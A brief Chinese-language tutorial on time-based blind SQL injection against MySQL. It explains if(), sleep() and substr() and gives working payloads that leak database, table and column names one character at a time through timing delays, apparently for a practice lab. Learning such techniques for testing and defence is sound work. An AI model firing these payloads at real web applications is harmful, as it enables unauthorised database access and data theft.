时间盲注

MySQL函数

if()：IF(expr1,expr2,expr3)，如果expr1的值为true，则返回expr2的值，如果expr1的值为false，

则返回expr3的值。

sleep(N)：通过在MySQL中执行select sleep(N)可以让此语句运行N秒钟。

substr()：截取字符串（用法：substr(string string,num start,num length);string为字符串；start为起始位置；length为长度。注意：mysql中的start是从1开始的）

 

数据库名：if((select ascii(substr(database(),1,1)) limit 0,1)>0,sleep(2),0)，直接二分法

 

数据表名：if((select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema='security' limit 0,1)>0,sleep(2),0)

 

数据列名：if((select ascii(substr(column_name,1,1)) from information_schema.columns where table_name='users' limit 0,1)>0,sleep(2),0)